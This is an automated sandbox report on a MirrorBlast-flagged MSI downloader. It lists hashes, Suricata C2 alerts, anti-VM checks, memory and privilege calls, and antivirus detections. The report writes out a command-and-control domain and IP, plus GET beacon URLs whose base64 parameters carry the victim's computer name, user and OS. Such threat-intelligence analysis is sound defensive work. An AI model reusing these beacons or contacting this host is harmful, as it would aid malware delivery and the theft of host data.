Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 8, 2021, 8:22 a.m.	Oct. 8, 2021, 8:24 a.m.

Size	548.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install trehjugdr4et6u version 2.99.7763, Author: Google, Keywords: Installer, Comments: This installer database contains the logic and data required to install trehjugdr4et6u., Template: Intel;1033, Revision Number: {317C5CB8-B185-4823-B543-49B4C65B72B5}, Create Time/Date: Thu Oct 7 10:43:26 2021, Last Saved Time/Date: Thu Oct 7 10:43:26 2021, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
MD5	`065e70c3b1e6841074a25aafa95e20bd`
SHA256	`a69d27abd043cc676095f71300bf6b2368167536fcd4fe5342cf79a7e94fc2fe`
CRC32	`C045916A`
ssdeep	`12288:oC3LUk7ftIXeWc5ie52YOqhPS+KP/w1pZGGgCs5xu8Z:ofaFAeWceYHPS3PIoA4xu`
Yara	Microsoft_Office_File_Zero - Microsoft Office File

msiexec.exe "C:\Windows\System32\msiexec.exe" /I C:\Users\test22\AppData\Local\Temp\trehjugdr4et6u.msi
1636
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
feristoaul.com	A 46.161.40.172	46.161.40.172

IP Address	Status	Action
164.124.101.2	Active	Moloch
46.161.40.172	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49174 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49174 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49167 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49165 -> 46.161.40.172:80	2034022	ET MALWARE MirrorBlast CnC Activity M2	Malware Command and Control Activity Detected
TCP 192.168.56.102:49167 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49166 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49166 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49176 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49176 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49177 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49177 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49172 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49172 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49179 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49175 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49179 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49175 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49180 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49180 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49185 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49185 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49181 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49181 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49193 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49193 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49184 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49184 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49189 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49192 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49197 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49189 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49192 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49197 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49187 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49187 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49165 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49213 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49191 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49213 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49191 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49188 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49196 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49188 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49196 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49168 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49168 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49200 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49200 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49195 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49195 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49220 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49199 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49220 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49199 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49201 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49201 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49182 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49182 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49205 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49207 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49205 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49207 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49203 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49203 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49183 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49183 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49208 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49208 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49206 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49206 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49211 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49211 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49209 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49209 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49219 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49186 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49219 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49216 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49216 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49190 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49190 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49217 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49222 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49217 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49222 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49221 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49221 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49194 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49194 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49223 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49223 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49198 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49198 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49202 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49202 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49215 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49215 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49169 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49169 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49218 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49218 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49170 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49170 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49171 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49171 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49173 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49173 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49178 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49178 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49204 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49204 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic
TCP 192.168.56.102:49212 -> 46.161.40.172:80	2034023	ET MALWARE MirrorBlast CnC Activity M3	Malware Command and Control Activity Detected
TCP 192.168.56.102:49212 -> 46.161.40.172:80	2034021	ET USER_AGENTS Suspicious User-Agent (REBOL)	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 8, 2021, 8:22 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 8, 2021, 8:22 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 8, 2021, 8:22 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 8, 2021, 8:22 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 8, 2021, 8:22 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://feristoaul.com/r?x=bmFtZT10ZXN0MjItUENcdGVzdDIyJm9zPTYuMSZhcmNoPXg4NiZidWlsZD0xLjAuMg==
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://feristoaul.com/m?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://feristoaul.com/p?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=

Performs some HTTP requests (3 events)

request	GET http://feristoaul.com/r?x=bmFtZT10ZXN0MjItUENcdGVzdDIyJm9zPTYuMSZhcmNoPXg4NiZidWlsZD0xLjAuMg==
request	GET http://feristoaul.com/m?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=
request	GET http://feristoaul.com/p?x=dXVpZD03NWJhYzA4My01MzFjLTQwM2QtYTgxMC02NWM1YjVmMjMxYmM=

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x731c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74681000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e32000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ef1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ec1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03870000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x039d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03a10000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 8, 2021, 8:22 a.m.	process_identifier: 1636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (5 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW Oct. 8, 2021, 8:22 a.m.	total_number_of_free_bytes: 10935271424 free_bytes_available: 10935271424 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW Oct. 8, 2021, 8:22 a.m.	number_of_free_clusters: 2669744 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Oct. 8, 2021, 8:22 a.m.	total_number_of_free_bytes: 10935271424 free_bytes_available: 10935271424 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW Oct. 8, 2021, 8:22 a.m.	number_of_free_clusters: 2669744 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW Oct. 8, 2021, 8:22 a.m.	total_number_of_free_bytes: 10934329344 free_bytes_available: 10934329344 root_path: C:\ total_number_of_bytes: 34252779520	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Lionic	Trojan.Ruby.Agent.a!c
Kaspersky	Trojan-Downloader.Ruby.Agent.b
DrWeb	Ruby.Downloader.2
McAfee	RDN/Generic Downloader.x

Checks for the Locally Unique Identifier on the system for a suspicious privilege (16 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeCreateTokenPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeMachineAccountPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeTcbPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeSecurityPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeRestorePrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeRemoteShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeEnableDelegationPrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeManageVolumePrivilege	1	1
LookupPrivilegeValueW Oct. 8, 2021, 8:22 a.m.	system_name: privilege_name: SeCreateGlobalPrivilege	1	1

trehjugdr4et6u.msi

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All